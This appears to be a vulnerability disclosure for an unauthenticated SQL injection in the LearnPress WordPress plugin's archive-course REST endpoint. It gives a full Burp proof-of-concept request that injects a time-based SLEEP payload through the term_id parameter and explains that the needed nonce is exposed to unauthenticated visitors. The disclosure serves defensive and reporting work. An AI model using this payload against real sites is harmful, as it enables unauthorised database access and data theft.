Description :

due to missing SQL Sanitization this endpoint wp-json/lp/v1/courses/archive-course is vulnerable to Unauthenticated SQLI in the term_id parameter

Plugin : https://wordpress.org/plugins/learnpress/

Taint Analysis :

Untitled

Untitled

Untitled

Untitled

X-WP-Nonce can be found at frontend for unauthenticated users

Untitled

POC :

i used SLEEP(10) for simple poc but attacker can inject any harmful payload other than this

Note : Don’t forget to add the X-WP-Nonce

unauth_sqli_learnpress.mp4

BURP Request :

POST /wordpress-6.4.2/wordpress/wp-json/lp/v1/courses/archive-course?term_id=1337)+OR+SLEEP(5)+--+A HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <http://localhost/wordpress-6.4.2/wordpress/courses/>
X-WP-Nonce: da35ff2e0c
Content-Type: application/json
Content-Length: 0
Origin: <http://localhost>
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin